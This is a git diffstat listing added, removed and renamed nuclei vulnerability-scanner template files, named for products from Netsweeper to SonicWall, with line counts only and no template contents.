.../Other/netsweeper-webadmin-detect.yaml | 24 - nuclei-templates/Other/news-flash.yaml | 59 + ...newsletter-manager-open-redirect-9075.yaml | 21 + .../newsletter-manager-open-redirect.yaml | 21 - .../Other/newsletter-open-redirect-9078.yaml | 22 - .../Other/newsletter-open-redirect.yaml | 17 + .../Other/nextcloud-detect-9080.yaml | 25 + nuclei-templates/Other/nextcloud-detect.yaml | 23 - nuclei-templates/Other/nextcloud-install.yaml | 3 +- .../Other/nexus-default-login-9086.yaml | 36 - .../Other/nexus-default-login-9089.yaml | 40 + nuclei-templates/Other/nexus-detect-9094.yaml | 23 + nuclei-templates/Other/nexus-detect-9095.yaml | 23 - .../{nginx-detect.yaml => nginx-Detect.yaml} | 0 nuclei-templates/Other/nginx-config-9098.yaml | 29 + nuclei-templates/Other/nginx-config-9099.yaml | 21 - .../Other/nginx-linux-page-9101.yaml | 20 + nuclei-templates/Other/nginx-linux-page.yaml | 16 - .../Other/nginx-module-vts-xss-9106.yaml | 23 - 
.../Other/nginx-module-vts-xss-9108.yaml | 28 + .../Other/nginx-proxy-manager-9114.yaml | 26 + .../Other/nginx-proxy-manager.yaml | 29 - nuclei-templates/Other/nginx-status-9115.yaml | 5 +- .../Other/nginx-version-9120.yaml | 25 - nuclei-templates/Other/nginx-version.yaml | 25 + .../Other/nginx_Misconfiguration.yaml | 167 + .../Other/ngrok-takeover-9126.yaml | 17 + nuclei-templates/Other/ngrok-takeover.yaml | 16 - nuclei-templates/Other/nifi-detech-9131.yaml | 25 - nuclei-templates/Other/nifi-detech.yaml | 29 + .../Other/ninjaform-open-redirect-9134.yaml | 27 + .../Other/ninjaform-open-redirect.yaml | 31 - .../Other/node-integration-enabled-9137.yaml | 24 + .../Other/node-integration-enabled.yaml | 17 - .../Other/node-red-detect-9139.yaml | 23 + nuclei-templates/Other/node-red-detect.yaml | 19 - nuclei-templates/Other/npm-log-file-9141.yaml | 22 + nuclei-templates/Other/npm-log-file.yaml | 18 - nuclei-templates/Other/npm.yaml | 23 - .../Other/ns-asg-file-read-9152.yaml | 24 - .../Other/ns-asg-file-read-9153.yaml | 36 + .../Other/ntlm-directories-9156.yaml | 64 - .../Other/ntlm-directories-9157.yaml | 81 + .../Other/nuuno-network-login-9161.yaml | 20 - .../Other/nuuno-network-login-9164.yaml | 19 + .../Other/nuuo-file-inclusion-9169.yaml | 30 - .../Other/nuuo-file-inclusion.yaml | 24 + .../nuuo-nvrmini2-upgradehandlephp-rce.yaml | 4 +- ...aml => oa-tongda-path-traversal-9179.yaml} | 0 .../Other/oa-v9-uploads-file-9189.yaml | 38 + .../Other/oa-v9-uploads-file.yaml | 36 - .../Other/oauth-access-key-9184.yaml | 15 + nuclei-templates/Other/oauth-access-key.yaml | 15 - .../Other/oauth2-detect-9181.yaml | 54 +- ...192.yaml => octobercms-default-login.yaml} | 0 nuclei-templates/Other/octobercms-detect.yaml | 3 +- .../Other/octoprint-login-9197.yaml | 23 + nuclei-templates/Other/octoprint-login.yaml | 19 - ...irect-9201.yaml => odoo-cms-redirect.yaml} | 0 .../Other/odoo-database-manager-9204.yaml | 23 + .../Other/odoo-database-manager.yaml | 23 - 
.../Other/ofbiz-default-login-9210.yaml | 30 - .../Other/ofbiz-default-login.yaml | 36 + .../Other/office-documents-links.yaml | 27 - .../Other/office365-open-redirect-9212.yaml | 7 +- nuclei-templates/Other/officedocuments.yaml | 24 + nuclei-templates/Other/officeweb365.yaml | 24 + ...oidc-detect-9217.yaml => oidc-detect.yaml} | 0 nuclei-templates/Other/oipm-detect-9221.yaml | 23 - nuclei-templates/Other/oipm-detect.yaml | 14 + nuclei-templates/Other/oki-data-9223.yaml | 19 - nuclei-templates/Other/oki-data-9226.yaml | 23 + .../Other/okiko-sfiler-portal.yaml | 8 +- nuclei-templates/Other/okta-panel-9231.yaml | 26 + nuclei-templates/Other/okta-panel-9234.yaml | 26 - .../Other/old-copyright-9237.yaml | 4 +- .../Other/oliver-library-lfi-9239.yaml | 3 - .../Other/olivetti-crf-detect-9244.yaml | 4 + .../Other/one_line_checks_nuclei.yaml | 30 - .../Other/onliner-multiple-bugs.yaml | 26 + ...=> oob-header-based-interaction-9249.yaml} | 0 .../oob-param-based-interaction-9252.yaml | 22 + .../oob-param-based-interaction-9253.yaml | 19 - .../Other/opcache-status-exposure-9254.yaml | 19 - .../Other/opcache-status-exposure-9255.yaml | 21 + .../Other/open-game-panel-9279.yaml | 23 - nuclei-templates/Other/open-game-panel.yaml | 22 + ...289.yaml => open-proxy-internal-9290.yaml} | 0 .../Other/open-proxy-localhost-9292.yaml | 63 - .../Other/open-proxy-localhost.yaml | 61 + .../Other/open-proxy-portscan-9295.yaml | 62 - .../Other/open-proxy-portscan.yaml | 62 + .../Other/open-redirect-9308.yaml | 116 - .../Other/open-redirect-9312.yaml | 38 + .../open-stack-dashboard-login-9323.yaml | 3 +- ...en-virtualization-manager-detect-9325.yaml | 42 + .../open-virtualization-manager-detect.yaml | 37 - ...pen-virtualization-manager-panel-9327.yaml | 45 + .../open-virtualization-manager-panel.yaml | 33 - .../Other/openam-detection-9257.yaml | 57 +- .../Other/openam-workflow-9258.yaml | 11 + .../Other/openam-workflow-9259.yaml | 11 - nuclei-templates/Other/openapi-2.yaml | 24 - 
nuclei-templates/Other/openapi.yaml | 33 + .../Other/openbmcs-ssrf-9261.yaml | 28 - nuclei-templates/Other/openbmcs-ssrf.yaml | 27 + .../Other/opencast-detect-9263.yaml | 28 - .../Other/opencast-detect-9265.yaml | 21 + nuclei-templates/Other/opencti-lfi-9268.yaml | 24 + nuclei-templates/Other/opencti-lfi.yaml | 31 - .../Other/openemr-detect-9271.yaml | 25 + .../Other/openemr-detect-9274.yaml | 26 - .../Other/openerp-database-9277.yaml | 18 - nuclei-templates/Other/openerp-database.yaml | 22 + nuclei-templates/Other/openrefine.yaml | 19 + .../Other/opensis-detect-9313.yaml | 24 + .../Other/opensis-detect-9314.yaml | 24 - nuclei-templates/Other/opensis-lfi-9317.yaml | 28 - nuclei-templates/Other/opensis-lfi.yaml | 28 + .../Other/opensis-workflow-9319.yaml | 2 +- nuclei-templates/Other/opensns-rce-9320.yaml | 33 - nuclei-templates/Other/opensns-rce.yaml | 29 + nuclei-templates/Other/openvpn-hhi-9329.yaml | 23 - nuclei-templates/Other/openvpn-hhi.yaml | 23 + nuclei-templates/Other/openweather.yaml | 23 + .../Other/openwrt-login-9333.yaml | 32 + nuclei-templates/Other/openwrt-login.yaml | 27 - ...ml => optilink-ont1gew-gpon-rce-9342.yaml} | 0 ...yaml => oracle-business-control-9346.yaml} | 0 .../Other/oracle-dbass-detect-9350.yaml | 21 + .../Other/oracle-dbass-detect-9351.yaml | 22 - nuclei-templates/Other/oracle-dbcs-9354.yaml | 24 + nuclei-templates/Other/oracle-dbcs-9355.yaml | 20 - ...oracle-ebs-bispgraph-file-access-9356.yaml | 20 - ...oracle-ebs-bispgraph-file-access-9360.yaml | 23 + .../Other/oracle-ebs-credentials-9366.yaml | 33 - .../Other/oracle-ebs-credentials.yaml | 28 + ...=> oracle-ebs-sqllog-disclosure-9370.yaml} | 0 .../Other/oracle-ebs-xss-9376.yaml | 29 + .../Other/oracle-ebs-xss-9377.yaml | 29 - .../Other/oracle-fatwire-lfi-9378.yaml | 22 - .../Other/oracle-fatwire-lfi-9379.yaml | 29 + .../Other/oracle-http-server-12c-9382.yaml | 24 + .../Other/oracle-http-server-12c-9384.yaml | 23 - .../Other/oracle-integrated-manager-9389.yaml | 31 + 
.../Other/oracle-integrated-manager-9390.yaml | 26 - ...ml => oracle-iplanet-web-server-9392.yaml} | 0 .../Other/oracle-people-enterprise-9394.yaml | 22 - .../Other/oracle-people-enterprise.yaml | 21 + .../Other/oracle-people-sign-in-9399.yaml | 25 - .../Other/oracle-people-sign-in.yaml | 25 + .../Other/oracle-siebel-xss-9400.yaml | 34 + nuclei-templates/Other/oracle-siebel-xss.yaml | 24 - .../Other/oracle-tns-listener.yaml | 32 + .../Other/oracle-tns-listner.yaml | 31 - .../Other/orbiteam-bscw-server-lfi-9404.yaml | 22 - .../Other/orbiteam-bscw-server-lfi.yaml | 28 + nuclei-templates/Other/orchid-store.yaml | 59 + .../Other/oscommerce-rce-9405.yaml | 37 + nuclei-templates/Other/oscommerce-rce.yaml | 31 - .../Other/otobo-open-redirect-9409.yaml | 22 - .../Other/otobo-open-redirect-9410.yaml | 19 + .../Other/owasp-juice-shop-detected-9418.yaml | 21 + .../Other/owasp-juice-shop-detected.yaml | 20 - .../Other/owncloud-config-9420.yaml | 25 - nuclei-templates/Other/owncloud-config.yaml | 21 + nuclei-templates/Other/package-json-9422.yaml | 26 + nuclei-templates/Other/package-json-9423.yaml | 26 - .../pacs-connexion-utilisateur-9426.yaml | 4 + .../Other/pacsone-server-lfi-9428.yaml | 19 + .../Other/pacsone-server-lfi-9429.yaml | 27 - nuclei-templates/Other/pagerduty.yaml | 25 + .../Other/pagespeed-global-admin-9433.yaml | 33 - .../Other/pagespeed-global-admin.yaml | 28 + .../Other/panabit-default-login-9437.yaml | 44 - .../Other/panabit-default-login-9438.yaml | 54 + nuclei-templates/Other/panabit-panalog.yaml | 33 + .../Other/panabit-panel-9444.yaml | 25 + .../Other/panabit-panel-9445.yaml | 24 - .../Other/panabit-sy_addmount-rce.yaml | 24 - ...og-fileread.yaml => panalog-fileRead.yaml} | 0 .../Other/pandora-fms-console-9451.yaml | 21 - .../Other/pandora-fms-console.yaml | 20 + .../Other/panos-default-login-9454.yaml | 34 + .../Other/panos-default-login-9457.yaml | 42 - .../Other/pantheon-takeover-9458.yaml | 18 - .../Other/pantheon-takeover-9459.yaml | 19 + 
.../Other/parallels-html-client-9462.yaml | 17 - .../Other/parallels-html-client-9464.yaml | 14 + .../Other/parentlink-xss-9466.yaml | 32 + .../Other/parentlink-xss-9467.yaml | 25 - nuclei-templates/Other/path-traversal.yaml | 189 - ...56.yaml => paypal-braintree-token(1).yaml} | 0 .../pbootcms-database-file-download-9469.yaml | 29 - .../pbootcms-database-file-download.yaml | 25 + .../Other/pdf-signer-ssti-to-rce-9471.yaml | 25 + .../Other/pdf-signer-ssti-to-rce.yaml | 22 - ...0.yaml => pentaho-default-login-9478.yaml} | 0 nuclei-templates/Other/perl-status.yaml | 2 +- .../Other/phalcon-framework-source-9494.yaml | 24 + .../Other/phalcon-framework-source-9495.yaml | 21 - .../Other/php-backup-files-9498.yaml | 51 - nuclei-templates/Other/php-backup-files.yaml | 45 + .../Other/php-debug-bar-9506.yaml | 1 - nuclei-templates/Other/php-errors-9511.yaml | 44 - nuclei-templates/Other/php-errors.yaml | 41 + nuclei-templates/Other/php-ini-9524.yaml | 24 - nuclei-templates/Other/php-ini.yaml | 27 + ...tect-1.yaml => php-proxy-detect-9544.yaml} | 0 nuclei-templates/Other/php-scanner-9547.yaml | 2 +- .../Other/php-timeclock-xss-9552.yaml | 31 - nuclei-templates/Other/php-timeclock-xss.yaml | 24 + ...yaml => php-user-ini-disclosure-9561.yaml} | 0 .../Other/php-zerodium-backdoor-rce-9570.yaml | 21 - .../Other/php-zerodium-backdoor-rce-9572.yaml | 26 + nuclei-templates/Other/phpMyAdmin-setup.yaml | 36 - .../Other/phpcollab-workflow-9502.yaml | 11 - .../Other/phpcollab-workflow.yaml | 11 + nuclei-templates/Other/phpinfo-9519.yaml | 44 - nuclei-templates/Other/phpinfo-files.yaml | 51 + .../Other/phpmyadmin-panel-9525.yaml | 30 + .../Other/phpmyadmin-panel-9526.yaml | 35 - .../Other/phpmyadmin-server-import.yaml | 35 - .../Other/phpmyadmin-setup-11857.yaml | 33 + .../Other/phpmyadmin-sql-9535.yaml | 19 +- .../Other/phppgadmin-panel-9543.yaml | 11 +- nuclei-templates/Other/phpunit-9557.yaml | 30 - nuclei-templates/Other/phpunit-9558.yaml | 30 + ...ki-lfi-9566.yaml => 
phpwiki-lfi-9564.yaml} | 0 .../Other/pi-hole-detect-9582.yaml | 26 + .../Other/pi-hole-detect-9583.yaml | 21 - .../Other/pictatic-api-key-9576.yaml | 16 - nuclei-templates/Other/pictatic-api-key.yaml | 13 + .../Other/pieregister-open-redirect-9577.yaml | 26 + .../Other/pieregister-open-redirect-9578.yaml | 19 - .../pieregister-plugin-open-redirect.yaml | 16 + .../Other/plastic-scm-login-9593.yaml | 20 + nuclei-templates/Other/plastic-scm-login.yaml | 20 - ...ian-9594.yaml => plesk-obsidian-9596.yaml} | 0 nuclei-templates/Other/plesk-onyx-9601.yaml | 19 - nuclei-templates/Other/plesk-onyx-login.yaml | 19 + ...sk-stat-9604.yaml => plesk-stat-9603.yaml} | 0 .../Other/plone-cms-detect-9606.yaml | 26 + nuclei-templates/Other/plone-cms-detect.yaml | 23 - nuclei-templates/Other/pma-server-import.yaml | 35 + .../Other/pmb-directory-traversal-9612.yaml | 22 - .../Other/pmb-directory-traversal-9613.yaml | 29 + .../Other/pmb-local-file-disclosure-9617.yaml | 23 - .../Other/pmb-local-file-disclosure.yaml | 19 + .../Other/pollbot-redirect-9623.yaml | 23 + nuclei-templates/Other/pollbot-redirect.yaml | 23 - ...com-login-9625.yaml => polycom-login.yaml} | 0 .../Other/portainer-init-deploy-9628.yaml | 24 - .../Other/portainer-init-deploy-9633.yaml | 23 + nuclei-templates/Other/postmark.yaml | 26 + .../Other/postmessage-outgoing-tracker.yaml | 7 +- ...ker-9640.yaml => postmessage-tracker.yaml} | 0 .../Other/powercreator-cms-rce-9644.yaml | 37 + .../Other/powercreator-cms-rce-9647.yaml | 42 - .../Other/powerlogic-ion-9650.yaml | 23 + nuclei-templates/Other/powerlogic-ion.yaml | 19 - .../Other/printers-info-leak-9652.yaml | 2 + ...private-key.yaml => private-key-9655.yaml} | 0 .../Other/processmaker-lfi-9662.yaml | 29 + nuclei-templates/Other/processmaker-lfi.yaml | 23 - nuclei-templates/Other/production-logs.yaml | 7 +- .../Other/proftpd-config-9667.yaml | 24 - nuclei-templates/Other/proftpd-config.yaml | 20 + .../Other/project-insight-login.yaml | 5 +- 
.../Other/prometheus-config-9673.yaml | 30 + nuclei-templates/Other/prometheus-config.yaml | 27 - .../Other/prometheus-exporter-9678.yaml | 30 + .../prometheus-exporter-detect-9676.yaml | 29 + .../Other/prometheus-exporter-detect.yaml | 28 - .../Other/prometheus-exporter.yaml | 25 - .../Other/prometheus-exposed-panel-9684.yaml | 17 + .../Other/prometheus-exposed-panel.yaml | 17 - .../Other/prometheus-flags-9687.yaml | 32 - nuclei-templates/Other/prometheus-flags.yaml | 31 + .../Other/prometheus-targets.yaml | 2 +- .../Other/proposify-takeover-9693.yaml | 16 + .../Other/proposify-takeover.yaml | 18 - nuclei-templates/Other/provider-path.yaml | 4 + ...prtg-detect.yaml => prtg-detect-9706.yaml} | 0 .../Other/public-tomcat-manager-9711.yaml | 10 +- .../Other/pulse-secure-panel-9714.yaml | 20 - .../Other/pulse-secure-panel-9715.yaml | 19 + .../puppet-node-manager-detect-9720.yaml | 24 + .../Other/puppet-node-manager-detect.yaml | 20 - .../Other/puppetdb-detect-9719.yaml | 9 +- ...722.yaml => puppetserver-detect-9721.yaml} | 0 nuclei-templates/Other/put-m-enb.yaml | 22 + .../Other/put-method-enabled-9728.yaml | 24 - .../putty-private-key-disclosure-9730.yaml | 7 +- .../Other/pypicloud-panel-9733.yaml | 6 +- .../Other/pyproject-disclosure-9738.yaml | 4 + .../Other/pyramid-debug-toolbar.yaml | 5 +- .../pyspider-unauthorized-access-9743.yaml | 31 - .../Other/pyspider-unauthorized-access.yaml | 27 + .../Other/python-app-sql-exceptions-9744.yaml | 21 - .../Other/python-app-sql-exceptions.yaml | 20 + ...ics-9745.yaml => python-metrics-9747.yaml} | 0 .../Other/qdpm-info-leak-9753.yaml | 25 + nuclei-templates/Other/qdpm-info-leak.yaml | 25 - ...ang-next-generation-firewall-rce-9759.yaml | 32 - ...ang-next-generation-firewall-rce-9761.yaml | 27 + ...load_all.yaml => qihang-media-upload.yaml} | 0 ...in-byPass.yaml => qizhi-login-bypass.yaml} | 0 .../Other/rabbitmq-dashboard-9778.yaml | 15 - .../Other/rabbitmq-dashboard.yaml | 15 + ....yaml => rabbitmq-default-admin-9780.yaml} | 0 
....yaml => rabbitmq-default-login-9783.yaml} | 0 nuclei-templates/Other/race-multiple.yaml | 23 - nuclei-templates/Other/race-simple.yaml | 46 + .../Other/rack-mini-profiler-9793.yaml | 17 - .../Other/rack-mini-profiler.yaml | 22 + .../Other/radius-manager-9795.yaml | 22 - nuclei-templates/Other/radius-manager.yaml | 23 + ...2.yaml => rails-database-config-9804.yaml} | 0 .../Other/rails-debug-mode-9807.yaml | 17 + nuclei-templates/Other/rails-debug-mode.yaml | 17 - .../rails-secret-token-disclosure-9809.yaml | 3 + nuclei-templates/Other/rails6-xss-9797.yaml | 32 - nuclei-templates/Other/rails6-xss-9800.yaml | 31 + .../Other/rancher-default-login-9815.yaml | 9 +- .../Other/rancher-panel-9817.yaml | 34 + nuclei-templates/Other/rancher-panel.yaml | 29 - .../Other/ranger-default-login-9828.yaml | 39 + .../Other/ranger-default-login.yaml | 39 - .../Other/ranger-detection-9829.yaml | 29 - nuclei-templates/Other/ranger-detection.yaml | 25 + nuclei-templates/Other/raw-get.yaml | 18 + .../Other/rce-cve-2021-41773.yaml | 47 - .../Other/rce-shellshock-user-agent.yaml | 12 +- nuclei-templates/Other/rconfig-rce-9836.yaml | 57 + nuclei-templates/Other/rconfig-rce-9837.yaml | 61 - .../Other/rdf-user-enumeration.yaml | 32 - nuclei-templates/Other/rdp-detect.yaml | 16 +- .../Other/readme-takeover-9841.yaml | 19 - nuclei-templates/Other/readme-takeover.yaml | 15 + .../Other/readthedocs-takeover-9846.yaml | 15 - .../Other/readthedocs-takeover-9847.yaml | 15 + .../Other/readynas_surveillance.yaml | 20 + nuclei-templates/Other/redash-detection.yaml | 23 - nuclei-templates/Other/redash-panel.yaml | 18 + ...or-9849.yaml => redcap-detector-9850.yaml} | 0 .../Other/redmine-cli-detect-9853.yaml | 8 +- nuclei-templates/Other/reflected-headers.yaml | 39 + nuclei-templates/Other/reflected-params.yaml | 354 - .../Other/remote-ui-login-9859.yaml | 3 - ...62.yaml => request-based-interaction.yaml} | 0 .../Other/resin-cnnvd-200705-315-9865.yaml | 25 - .../Other/resin-cnnvd-200705-315-9867.yaml | 
26 + ...-lfr-9874.yaml => resin-viewfile-lfr.yaml} | 0 .../Other/robomongo-credential-9884.yaml | 28 - .../Other/robomongo-credential-9885.yaml | 28 + nuclei-templates/Other/robots-txt-9888.yaml | 31 - nuclei-templates/Other/robots-txt.yaml | 28 + ...94.yaml => rocketmq-console-exposure.yaml} | 0 .../Other/rockmongo-default-login-9897.yaml | 37 - .../Other/rockmongo-default-login-9899.yaml | 46 + .../Other/roundcube-log-disclosure-9905.yaml | 26 + .../Other/roundcube-log-disclosure.yaml | 22 - ...os-login.yaml => routeros-login-9909.yaml} | 0 ...ect-9917.yaml => rstudio-detect-9919.yaml} | 0 ...by-on-rails-framework-exceptions-9921.yaml | 7 +- .../Other/ruijie-EG-fileDown.yaml | 24 - .../Other/ruijie-eg-filedown.yaml | 22 + ...9922.yaml => ruijie-eg-password-leak.yaml} | 0 .../Other/ruijie-eg-rce-9926.yaml | 18 +- .../ruijie-information-disclosure-9931.yaml | 22 + .../ruijie-information-disclosure-9932.yaml | 21 - .../Other/ruijie-networks-lfi-9938.yaml | 26 + .../Other/ruijie-networks-lfi-9940.yaml | 27 - .../Other/ruijie-networks-rce-9943.yaml | 31 + .../Other/ruijie-networks-rce-9949.yaml | 38 - .../Other/ruijie-phpinfo-9951.yaml | 21 - nuclei-templates/Other/ruijie-phpinfo.yaml | 22 + nuclei-templates/Other/rusty-joomla-9955.yaml | 46 - nuclei-templates/Other/rusty-joomla.yaml | 38 + .../Other/s3-subtakeover-9967.yaml | 24 + nuclei-templates/Other/s3-subtakeover.yaml | 20 - nuclei-templates/Other/s3cmd-config-9961.yaml | 25 + nuclei-templates/Other/s3cmd-config.yaml | 21 - nuclei-templates/Other/s3hunter.yaml | 3 +- .../Other/saferoads-vms-login-9971.yaml | 18 - .../Other/saferoads-vms-login.yaml | 17 + nuclei-templates/Other/sage-detect-9975.yaml | 24 + nuclei-templates/Other/sage-detect-9977.yaml | 19 - .../Other/salesforce-aura-9981.yaml | 19 + nuclei-templates/Other/salesforce-aura.yaml | 19 - nuclei-templates/Other/samba-config-9987.yaml | 24 - nuclei-templates/Other/samba-config.yaml | 20 + nuclei-templates/Other/samba-detect-9988.yaml | 27 - 
nuclei-templates/Other/samba-detect.yaml | 27 + ...sung-wlan-ap-default-credentials-9995.yaml | 25 - .../samsung-wlan-ap-default-credentials.yaml | 22 + .../Other/samsung-wlan-ap-lfi-10003.yaml | 22 + .../Other/samsung-wlan-ap-lfi-9999.yaml | 21 - ...04.yaml => samsung-wlan-ap-rce-10007.yaml} | 0 ...ss.yaml => samsung-wlan-ap-xss-10012.yaml} | 0 .../samsung-wlan-default-login-10018.yaml | 38 - .../Other/samsung-wlan-default-login.yaml | 39 + .../Other/sangfor-ba-rce-10021.yaml | 32 - nuclei-templates/Other/sangfor-ba-rce.yaml | 26 + .../Other/sangfor-edr-auth-bypass-10024.yaml | 24 +- .../Other/sangfor-edr-rce-10028.yaml | 25 + .../Other/sangfor-edr-rce-10030.yaml | 34 - .../Other/sap-hana-xsengine-panel.yaml | 2 +- .../Other/sap-igs-detect-10040.yaml | 33 - nuclei-templates/Other/sap-igs-detect.yaml | 39 + .../Other/sap-netweaver-detect-10047.yaml | 30 + .../Other/sap-netweaver-detect.yaml | 26 - .../Other/sap-netweaver-info-leak-10049.yaml | 28 - .../Other/sap-netweaver-info-leak-10051.yaml | 28 + ...l-10055.yaml => sap-netweaver-portal.yaml} | 0 ...ver-rce.yaml => sap-netweaver-rce(1).yaml} | 0 ...i-10058.yaml => sap-netweaver-webgui.yaml} | 0 .../Other/sap-recon-detect-10062.yaml | 36 + .../Other/sap-recon-detect-10063.yaml | 29 - .../Other/sap-redirect-10066.yaml | 22 + nuclei-templates/Other/sap-redirect.yaml | 28 - .../Other/sap-web-dispatcher-10078.yaml | 21 - ...sap-web-dispatcher-admin-portal-10071.yaml | 8 +- .../Other/sap-web-dispatcher.yaml | 19 + ...i-panel.yaml => sapfiori-panel-10033.yaml} | 0 .../Other/sar2html-rce-10081.yaml | 24 + nuclei-templates/Other/sar2html-rce.yaml | 19 - .../Other/sassy-social-share-10086.yaml | 17 - .../Other/sassy-social-share-xss.yaml | 26 + .../Other/sauter-login-10089.yaml | 21 - nuclei-templates/Other/sauter-login.yaml | 20 + ...detect-10094.yaml => sceditor-detect.yaml} | 0 .../Other/scs-landfill-control.yaml | 5 +- nuclei-templates/Other/seacms-rce-10100.yaml | 24 - nuclei-templates/Other/seacms-rce-10101.yaml | 26 
+ ...{searches (copy 1).yaml => searchbar.yaml} | 0 nuclei-templates/Other/seats-login.yaml | 3 + ...-detect-10112.yaml => secmail-detect.yaml} | 0 ...aml => secnet-ac-default-login-10113.yaml} | 0 .../Other/securenvoy-panel-10114.yaml | 19 + .../Other/securenvoy-panel-10116.yaml | 23 - .../Other/securepoint-utm-10118.yaml | 5 - ...ect.yaml => securityspy-detect-10119.yaml} | 0 .../Other/seeddms-default-login-10127.yaml | 6 +- ...-10135.yaml => selea-ip-camera-10133.yaml} | 0 ...0137.yaml => selenium-exposure-10138.yaml} | 0 ...id-api-11859.yaml => sendgrid-api(1).yaml} | 0 nuclei-templates/Other/sendgrid-api-key.yaml | 2 +- .../sensitive-storage-exposure-10143.yaml | 32 - .../Other/sensitive-storage-exposure.yaml | 30 + .../Other/seowon-router-rce-10147.yaml | 27 - .../Other/seowon-router-rce-10148.yaml | 28 + .../Other/sequoiadb-default-login-10150.yaml | 16 +- ...in-10156.yaml => server-backup-login.yaml} | 0 .../Other/server-backup-manager-se-10159.yaml | 22 + .../Other/server-backup-manager-se-10160.yaml | 23 - .../Other/server-status-localhost-10163.yaml | 28 - .../Other/server-status-localhost-10166.yaml | 28 + .../Other/servfail-refused-hosts-10169.yaml | 23 + .../Other/servfail-refused-hosts-10170.yaml | 17 - nuclei-templates/Other/service-pwd-10176.yaml | 26 - nuclei-templates/Other/service-pwd.yaml | 22 + .../Other/servicedesk-login-panel-10171.yaml | 19 - .../Other/servicedesk-login-panel-10173.yaml | 26 + .../Other/servicenow-helpdesk-credential.yaml | 3 +- .../Other/setup-page-exposure-10180.yaml | 20 + .../Other/setup-page-exposure-10181.yaml | 19 - .../Other/sharecenter-login-10189.yaml | 5 +- .../Other/shell-history-10192.yaml | 51 + nuclei-templates/Other/shell-history.yaml | 46 - ...pped100-sqli.yaml => shipped100-sqli.yaml} | 0 ...n.yaml => shopify-custom-token-10198.yaml} | 0 .../Other/shopify-private-token-11861.yaml | 5 +- .../Other/shopify-shared-secret-11862.yaml | 13 + .../Other/shopify-shared-secret.yaml | 16 - 
.../Other/shopify-takeover-10203.yaml | 12 +- ...fy-token-10205.yaml => shopify-token.yaml} | 0 .../Other/shoppable-token-10206.yaml | 20 + .../Other/shoppable-token-10208.yaml | 16 - .../Other/shopware-detect-10213.yaml | 28 + nuclei-templates/Other/shopware-detect.yaml | 24 - ...code-lfi.yaml => shortcode-lfi-10215.yaml} | 0 .../Other/shoutcast-server-10217.yaml | 21 - nuclei-templates/Other/shoutcast-server.yaml | 21 + .../Other/showdoc-default-login-10219.yaml | 38 - .../Other/showdoc-default-login-10222.yaml | 40 + .../Other/showdoc-file-upload-rce-10225.yaml | 44 + .../Other/showdoc-file-upload-rce-10229.yaml | 43 - .../Other/sick-beard-xss-10230.yaml | 4 +- .../Other/sidekiq-dashboard-10236.yaml | 5 +- nuclei-templates/Other/signatures-10251.yaml | 21 + nuclei-templates/Other/signatures-10263.yaml | 22 + .../Other/simple-crm-sql-injection-10278.yaml | 1 - .../Other/simple-employee-rce-10280.yaml | 49 + .../Other/simple-employee-rce.yaml | 49 - .../simple-image-manipulator-lfi-10281.yaml | 21 - .../Other/simple-image-manipulator-lfi.yaml | 27 + .../Other/simplebooklet-takeover-10271.yaml | 18 - .../Other/simplebooklet-takeover.yaml | 15 + .../Other/site-map-sql-injection.yaml | 40 - .../Other/sitecore-debug-page-10284.yaml | 20 + .../Other/sitecore-debug-page.yaml | 20 - nuclei-templates/Other/sitecore-login.yaml | 2 +- .../Other/sitecore-version-10292.yaml | 31 + nuclei-templates/Other/sitecore-version.yaml | 25 - .../Other/sitefinity-login-10295.yaml | 23 + .../Other/sitefinity-login-10298.yaml | 22 - .../Other/sitemap-sql-injection.yaml | 21 + .../Other/siteomat-login-10303.yaml | 19 - nuclei-templates/Other/siteomat-login.yaml | 20 + .../Other/skycaiji-admin-panel-10304.yaml | 27 + .../Other/skycaiji-admin-panel.yaml | 27 - .../Other/skycaiji-install-10309.yaml | 11 +- ...udio-lfi-10319.yaml => sl-studio-lfi.yaml} | 0 nuclei-templates/Other/slack-api.yaml | 3 + .../Other/slack-bot-token-10313.yaml | 18 + nuclei-templates/Other/slack-bot-token.yaml | 15 - 
nuclei-templates/Other/slack-webhook(1).yaml | 13 - .../Other/slack-webhook-11865.yaml | 16 + nuclei-templates/Other/slack.yaml | 25 - .../Other/slocum-login-10316.yaml | 22 - nuclei-templates/Other/slocum-login.yaml | 18 + ...0325.yaml => smartjob-takeover-10322.yaml} | 0 ...326.yaml => smartling-takeover-10327.yaml} | 0 .../Other/smartstore-detect-10333.yaml | 28 - .../Other/smartstore-detect-10334.yaml | 28 + .../Other/smb-v1-detection-10336.yaml | 18 + nuclei-templates/Other/smb-v1-detection.yaml | 19 - .../Other/smugmug-takeover-10340.yaml | 15 + nuclei-templates/Other/smugmug-takeover.yaml | 15 - nuclei-templates/Other/sniplets-lfi.yaml | 12 +- ...plets-xss-10344.yaml => sniplets-xss.yaml} | 0 .../snyk-ignore-file-disclosure-10348.yaml | 7 +- .../sofneta-mecdream-pacs-lfi-10350.yaml | 27 - .../Other/sofneta-mecdream-pacs-lfi.yaml | 30 + .../Other/solarwinds-default-admin-1.yaml | 38 + .../Other/solarwinds-default-admin-2.yaml | 38 - .../Other/solarwinds-default-login-10355.yaml | 37 - .../Other/solarwinds-default-login-10356.yaml | 53 + .../Other/solarwinds-orion-10359.yaml | 7 +- .../solarwinds-servuftp-detect-10360.yaml | 29 + .../Other/solarwinds-servuftp-detect.yaml | 24 - .../Other/solr-exposure-10363.yaml | 28 + .../Other/solr-exposure-10364.yaml | 14 - .../Other/solr-query-dashboard-10367.yaml | 28 - .../Other/solr-query-dashboard-10368.yaml | 25 + nuclei-templates/Other/somfy-login-10371.yaml | 22 - nuclei-templates/Other/somfy-login.yaml | 18 + ...-10374.yaml => sonarqube-login-10376.yaml} | 0 .../Other/sonarqube-public-projects.yaml | 3 +- .../Other/sonarqube-token-10380.yaml | 15 + .../Other/sonarqube-token-10382.yaml | 15 - ...sonicwall-email-security-detect-10384.yaml | 20 + .../sonicwall-email-security-detect.yaml | 17 - .../sonicwall-management-panel-10387.yaml | 17 - .../Other/sonicwall-management-panel.yaml | 15 + .../Other/sonicwall-sslvpn-panel.yaml | 2 +- .../sonicwall-sslvpn-shellshock-10391.yaml | 27 + 
